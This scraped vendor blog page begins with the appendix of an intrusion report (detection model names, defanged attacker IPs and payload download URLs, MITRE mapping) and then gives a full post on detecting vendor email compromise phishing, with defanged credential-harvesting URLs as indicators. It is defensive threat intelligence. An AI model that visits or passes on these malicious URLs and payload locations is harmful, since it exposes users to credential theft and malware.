Credit to Emily Megan Lim (Senior Cyber Analyst), Vivek Rajan (Senior Cyber Analyst), Ryan Traill (Analyst Content Lead), and Sam Lister (Specialist Security Researcher)

Appendices

Darktrace Model Detections

Anomalous Connection / Active Remote Desktop Tunnel

Anomalous Connection / Data Sent to Rare Domain

Anomalous Connection / New User Agent to IP Without Hostname

Anomalous Connection / Possible Data Staging and External Upload

Anomalous Connection / Rare WinRM Incoming

Anomalous Connection / Rare WinRM Outgoing

Anomalous Connection / Uncommon 1 GiB Outbound

Anomalous Connection / Unusual Admin RDP Session

Anomalous Connection / Unusual Incoming Long Remote Desktop Session

Anomalous Connection / Unusual Incoming Long SSH Session

Anomalous Connection / Unusual Long SSH Session

Anomalous File / EXE from Rare External Location

Anomalous Server Activity / Anomalous External Activity from Critical Network Device

Anomalous Server Activity / Outgoing from Server

Anomalous Server Activity / Rare External from Server

Compliance / Default Credential Usage

Compliance / High Priority Compliance Model Alert

Compliance / Outgoing NTLM Request from DC

Compliance / SSH to Rare External Destination

Compromise / Large Number of Suspicious Successful Connections

Compromise / Sustained TCP Beaconing Activity To Rare Endpoint

Device / Anomalous Certificate Download Activity

Device / Anomalous SSH Followed By Multiple Model Alerts

Device / Anonymous NTLM Logins

Device / Attack and Recon Tools

Device / ICMP Address Scan

Device / Large Number of Model Alerts

Device / Network Range Scan

Device / Network Scan

Device / New User Agent To Internal Server

Device / Possible SMB/NTLM Brute Force

Device / Possible SMB/NTLM Reconnaissance

Device / RDP Scan

Device / Reverse DNS Sweep

Device / Suspicious SMB Scanning Activity

Device / UDP Enumeration

Unusual Activity / Unusual External Data to New Endpoint

Unusual Activity / Unusual External Data Transfer

User / Multiple Uncommon New Credentials on Device

User / New Admin Credentials on Client

User / New Admin Credentials on Server

Enhanced Monitoring Models

Compromise / Anomalous Certificate Download and Kerberos Login

Device / Initial Attack Chain Activity

Device / Large Number of Model Alerts from Critical Network Device

Device / Multiple Lateral Movement Model Alerts

Device / Suspicious Network Scan Activity

Unusual Activity / Enhanced Unusual External Data Transfer

Antigena/Autonomous Response Models

Antigena / Network / External Threat / Antigena File then New Outbound Block

Antigena / Network / External Threat / Antigena Suspicious Activity Block

Antigena / Network / External Threat / Antigena Suspicious File Block

Antigena / Network / Insider Threat / Antigena Large Data Volume Outbound Block

Antigena / Network / Insider Threat / Antigena Network Scan Block

Antigena / Network / Insider Threat / Antigena Unusual Privileged User Activities Block

Antigena / Network / Manual / Quarantine Device

Antigena / Network / Significant Anomaly / Antigena Alerts Over Time Block

Antigena / Network / Significant Anomaly / Antigena Controlled and Model Alert

Antigena / Network / Significant Anomaly / Antigena Enhanced Monitoring from Client Block

Antigena / Network / Significant Anomaly / Antigena Enhanced Monitoring from Server Block

Antigena / Network / Significant Anomaly / Antigena Significant Anomaly from Client Block

Antigena / Network / Significant Anomaly / Antigena Significant Server Anomaly Block

Antigena / Network / Significant Anomaly / Repeated Antigena Alerts

List of Indicators of Compromise (IoCs)

·      66.165.243[.]39 – IP Address – Data exfiltration endpoint

·      107.155.69[.]42 – IP Address – Probable data exfiltration endpoint

·      107.155.93[.]154 – IP Address – Likely Data exfiltration endpoint

·      137.184.126[.]86 – IP Address – Possible C2 endpoint

·      85.239.52[.]96 – IP Address – Likely C2 endpoint

·      hxxp://85.239.52[.]96:8000/vmwarecli  – URL – File download

·      hxxp://137.184.126[.]86:8080/vmwaretools – URL – File download

MITRE ATT&CK Mapping

Initial Access – T1190 – Exploit Public-Facing Application

Reconnaissance – T1590.002 – Gather Victim Network Information: DNS

Reconnaissance – T1590.005 – Gather Victim Network Information: IP Addresses

Reconnaissance – T1592.004 – Gather Victim Host Information: Client Configurations

Reconnaissance – T1595 – Active Scanning

Discovery – T1018 – Remote System Discovery

Discovery – T1046 – Network Service Discovery

Discovery – T1083 – File and Directory Discovery

Discovery – T1135 – Network Share Discovery

Lateral Movement – T1021.001 – Remote Services: Remote Desktop Protocol

Lateral Movement – T1021.004 – Remote Services: SSH

Lateral Movement – T1021.006 – Remote Services: Windows Remote Management

Lateral Movement – T1550.002 – Use Alternate Authentication Material: Pass the Hash

Lateral Movement – T1550.003 – Use Alternate Authentication Material: Pass the Ticket

Credential Access – T1110.001 – Brute Force: Password Guessing

Credential Access – T1649 – Steal or Forge Authentication Certificates

Persistence, Privilege Escalation – T1078 – Valid Accounts

Resource Development – T1588.001 – Obtain Capabilities: Malware

Command and Control – T1071.001 – Application Layer Protocol: Web Protocols

Command and Control – T1105 – Ingress Tool Transfer

Command and Control – T1573 – Encrypted Channel

Collection – T1074 – Data Staged

Exfiltration – T1041 – Exfiltration Over C2 Channel

Exfiltration – T1048 – Exfiltration Over Alternative Protocol

References

[1] https://thehackernews.com/2025/08/sonicwall-investigating-potential-ssl.html

[2] https://www.sonicwall.com/support/notices/gen-7-and-newer-sonicwall-firewalls-sslvpn-recent-threat-activity/250804095336430

[3] https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0015

[4] https://arcticwolf.com/resources/blog/arctic-wolf-observes-akira-ransomware-campaign-targeting-sonicwall-sslvpn-accounts/

[5] https://www.rapid7.com/blog/post/dr-akira-ransomware-group-utilizing-sonicwall-devices-for-initial-access/

[6] https://www.ic3.gov/AnnualReport/Reports/2024_IC3Report.pdf

[7] https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-109a

[8] https://blog.talosintelligence.com/akira-ransomware-continues-to-evolve/

[9] https://www.ransomware.live/map?year=2025&q=akira

[10] https://attack.mitre.org/groups/G1024/
[11] https://labs.lares.com/fear-kerberos-pt2/#UNPAC

[12] https://www.thehacker.recipes/ad/movement/kerberos/unpac-the-hash

[13] https://www.s-rminform.com/latest-thinking/derailing-akira-cyber-threat-intelligence)

[14] https://fieldeffect.com/blog/update-akira-ransomware-group-targets-sonicwall-vpn-appliances

[15] https://arcticwolf.com/resources/blog/arctic-wolf-observes-july-2025-uptick-in-akira-ransomware-activity-targeting-sonicwall-ssl-vpn/

Continue reading
About the author
Emily Megan Lim
Cyber Analyst

Blog

/

Email

/

September 30, 2025

Out of Character: Detecting Vendor Compromise and Trusted Relationship Abuse with Darktrace

vendor email compromiseDefault blog imageDefault blog image

What is Vendor Email Compromise?

Vendor Email Compromise (VEC) refers to an attack where actors breach a third-party provider to exploit their access, relationships, or systems for malicious purposes. The initially compromised entities are often the target’s existing partners, though this can extend to any organization or individual the target is likely to trust.

It sits at the intersection of supply chain attacks and business email compromise (BEC), blending technical exploitation with trust-based deception. Attackers often infiltrate existing conversations, leveraging AI to mimic tone and avoid common spelling and grammar pitfalls. Malicious content is typically hosted on otherwise reputable file sharing platforms, meaning any shared links initially seem harmless.

While techniques to achieve initial access may have evolved, the goals remain familiar. Threat actors harvest credentials, launch subsequent phishing campaigns, attempt to redirect invoice payments for financial gain, and exfiltrate sensitive corporate data.

Why traditional defenses fall short

These subtle and sophisticated email attacks pose unique challenges for defenders. Few busy people would treat an ongoing conversation with a trusted contact with the same level of suspicion as an email from the CEO requesting ‘URGENT ASSISTANCE!’ Unfortunately, many traditional secure email gateways (SEGs) struggle with this too. Detecting an out-of-character email, when it does not obviously appear out of character, is a complex challenge. It’s hardly surprising, then, that 83% of organizations have experienced a security incident involving third-party vendors [1].  

This article explores how Darktrace detected four different vendor compromise campaigns for a single customer, within a two-week period in 2025.  Darktrace / EMAIL successfully identified the subtle indicators that these seemingly benign emails from trusted senders were, in fact, malicious. Due to the configuration of Darktrace / EMAIL in this customer’s environment, it was unable to take action against the malicious emails. However, if fully enabled to take Autonomous Response, it would have held all offending emails identified.

How does Darktrace detect vendor compromise?

The answer lies at the core of how Darktrace operates: anomaly detection. Rather than relying on known malicious rules or signatures, Darktrace learns what ‘normal’ looks like for an environment, then looks for anomalies across a wide range of metrics. Despite the resourcefulness of the threat actors involved in this case, Darktrace identified many anomalies across these campaigns.

Different campaigns, common traits

A wide variety of approaches was observed. Individuals, shared mailboxes and external contractors were all targeted. Two emails originated from compromised current vendors, while two came from unknown compromised organizations - one in an associated industry. The sender organizations were either familiar or, at the very least, professional in appearance, with no unusual alphanumeric strings or suspicious top-level domains (TLDs). Subject line, such as “New Approved Statement From [REDACTED]” and “[REDACTED] - Proposal Document” appeared unremarkable and were not designed to provoke heightened emotions like typical social engineering or BEC attempts.

All emails had been given a Microsoft Spam Confidence Level of 1, indicating Microsoft did not consider them to be spam or malicious [2]. They also passed authentication checks (including SPF, and in some cases DKIM and DMARC), meaning they appeared to originate from an authentic source for the sender domain and had not been tampered with in transit.  

All observed phishing emails contained a link hosted on a legitimate and commonly used file-sharing site. These sites were often convincingly themed, frequently featuring the name of a trusted vendor either on the page or within the URL, to appear authentic and avoid raising suspicion. However, these links served only as the initial step in a more complex, multi-stage phishing process.

A legitimate file sharing site used in phishing emails to host a secondary malicious link.
Figure 1: A legitimate file sharing site used in phishing emails to host a secondary malicious link.
Another example of a legitimate file sharing endpoint sent in a phishing email and used to host a malicious link.
Figure 2: Another example of a legitimate file sharing endpoint sent in a phishing email and used to host a malicious link.

If followed, the recipient would be redirected, sometimes via CAPTCHA, to fake Microsoft login pages designed to capturing credentials, namely http://pub-ac94c05b39aa4f75ad1df88d384932b8.r2[.]dev/offline[.]html and https://s3.us-east-1.amazonaws[.]com/s3cure0line-0365cql0.19db86c3-b2b9-44cc-b339-36da233a3be2ml0qin/s3cccql0.19db86c3-b2b9-44cc-b339-36da233a3be2%26l0qn[.]html#.

The latter made use of homoglyphs to deceive the user, with a link referencing ‘s3cure0line’, rather than ‘secureonline’. Post-incident investigation using open-source intelligence (OSINT) confirmed that the domains were linked to malicious phishing endpoints [3] [4].

Fake Microsoft login page designed to harvest credentials.
Figure 3: Fake Microsoft login page designed to harvest credentials.
Phishing kit with likely AI-generated image, designed to harvest user credentials. The URL uses ‘s3cure0line’ instead of ‘secureonline’, a subtle misspelling intended to deceive users.
Figure 4: Phishing kit with likely AI-generated image, designed to harvest user credentials. The URL uses ‘s3cure0line’ instead of ‘secureonline’, a subtle misspelling intended to deceive users.

Darktrace Anomaly Detection

Some senders were unknown to the network, with no previous outbound or inbound emails. Some had sent the email to multiple undisclosed recipients using BCC, an unusual behavior for a new sender.  

Where the sender organization was an existing vendor, Darktrace recognized out-of-character behavior, in this case it was the first time a link to a particular file-sharing site had been shared. Often the links themselves exhibited anomalies, either being unusually prominent or hidden altogether - masked by text or a clickable image.

Crucially, Darktrace / EMAIL is able to identify malicious links at the time of processing the emails, without needing to visit the URLs or analyze the destination endpoints, meaning even the most convincing phishing pages cannot evade detection – meaning even the most convincing phishing emails cannot evade detection. This sets it apart from many competitors who rely on crawling the endpoints present in emails. This, among other things, risks disruption to user experience, such as unsubscribing them from emails, for instance.

Darktrace was also able to determine that the malicious emails originated from a compromised mailbox, using a series of behavioral and contextual metrics to make the identification. Upon analysis of the emails, Darktrace autonomously assigned several contextual tags to highlight their concerning elements, indicating that the messages contained phishing links, were likely sent from a compromised account, and originated from a known correspondent exhibiting out-of-character behavior.

A summary of the anomalous email, confirming that it contained a highly suspicious link.
Figure 5: Tags assigned to offending emails by Darktrace / EMAIL.

Figure 6: A summary of the anomalous email, confirming that it contained a highly suspicious link.

Out-of-character behavior caught in real-time

In another customer environment around the same time Darktrace / EMAIL detected multiple emails with carefully crafted, contextually appropriate subject lines sent from an established correspondent being sent to 30 different recipients. In many cases, the attacker hijacked existing threads and inserted their malicious emails into an ongoing conversation in an effort to blend in and avoid detection. As in the previous, the attacker leveraged a well-known service, this time ClickFunnels, to host a document containing another malicious link. Once again, they were assigned a Microsoft Spam Confidence Level of 1, indicating that they were not considered malicious.

The legitimate ClickFunnels page used to host a malicious phishing link.
Figure 7: The legitimate ClickFunnels page used to host a malicious phishing link.

This time, however, the customer had Darktrace / EMAIL fully enabled to take Autonomous Response against suspicious emails. As a result, when Darktrace detected the out-of-character behavior, specifically, the sharing of a link to a previously unused file-sharing domain, and identified the likely malicious intent of the message, it held the email, preventing it from reaching recipients’ inboxes and effectively shutting down the attack.

Figure 8: Darktrace / EMAIL’s detection of malicious emails inserted into an existing thread.*

*To preserve anonymity, all real customer names, email addresses, and other identifying details have been redacted and replaced with fictitious placeholders.

Legitimate messages in the conversation were assigned an Anomaly Score of 0, while the newly inserted malicious emails identified and were flagged with the maximum score of 100.

Key takeaways for defenders

Phishing remains big business, and as the landscape evolves, today’s campaigns often look very different from earlier versions. As with network-based attacks, threat actors are increasingly leveraging legitimate tools and exploiting trusted relationships to carry out their malicious goals, often staying under the radar of security teams and traditional email defenses.

As attackers continue to exploit trusted relationships between organizations and their third-party associates, security teams must remain vigilant to unexpected or suspicious email activity. Protecting the digital estate requires an email solution capable of identifying malicious characteristics, even when they originate from otherwise trusted senders.

Credit to Jennifer Beckett (Cyber Analyst), Patrick Anjos (Senior Cyber Analyst), Ryan Traill (Analyst Content Lead), Kiri Addison (Director of Product)

Appendices

IoC - Type - Description + Confidence  

- http://pub-ac94c05b39aa4f75ad1df88d384932b8.r2[.]dev/offline[.]html#p – fake Microsoft login page

- https://s3.us-east-1.amazonaws[.]com/s3cure0line-0365cql0.19db86c3-b2b9-44cc-b339-36da233a3be2ml0qin/s3cccql0.19db86c3-b2b9-44cc-b339-36da233a3be2%26l0qn[.]html# - link to domain used in homoglyph attack

MITRE ATT&CK Mapping  

Tactic – Technique – Sub-Technique  

Initial Access - Phishing – (T1566)  

References

1.     https://gitnux.org/third-party-risk-statistics/

2.     https://learn.microsoft.com/en-us/defender-office-365/anti-spam-spam-confidence-level-scl-about

3.     https://www.virustotal.com/gui/url/5df9aae8f78445a590f674d7b64c69630c1473c294ce5337d73732c03ab7fca2/detection

4.     https://www.virustotal.com/gui/url/695d0d173d1bd4755eb79952704e3f2f2b87d1a08e2ec660b98a4cc65f6b2577/details

The content provided in this blog is published by Darktrace for general informational purposes only and reflects our understanding of cybersecurity topics, trends, incidents, and developments at the time of publication. While we strive to ensure accuracy and relevance, the information is provided “as is” without any representations or warranties, express or implied. Darktrace makes no guarantees regarding the completeness, accuracy, reliability, or timeliness of any information presented and expressly disclaims all warranties.

Nothing in this blog constitutes legal, technical, or professional advice, and readers should consult qualified professionals before acting on any information contained herein. Any references to third-party organizations, technologies, threat actors, or incidents are for informational purposes only and do not imply affiliation, endorsement, or recommendation.

Darktrace, its affiliates, employees, or agents shall not be held liable for any loss, damage, or harm arising from the use of or reliance on the information in this blog.

The cybersecurity landscape evolves rapidly, and blog content may become outdated or superseded. We reserve the right to update, modify, or remove any content

Continue reading
About the author
Jennifer Beckett
Cyber Analyst
Your data. Our AI.
Elevate your network security with Darktrace AI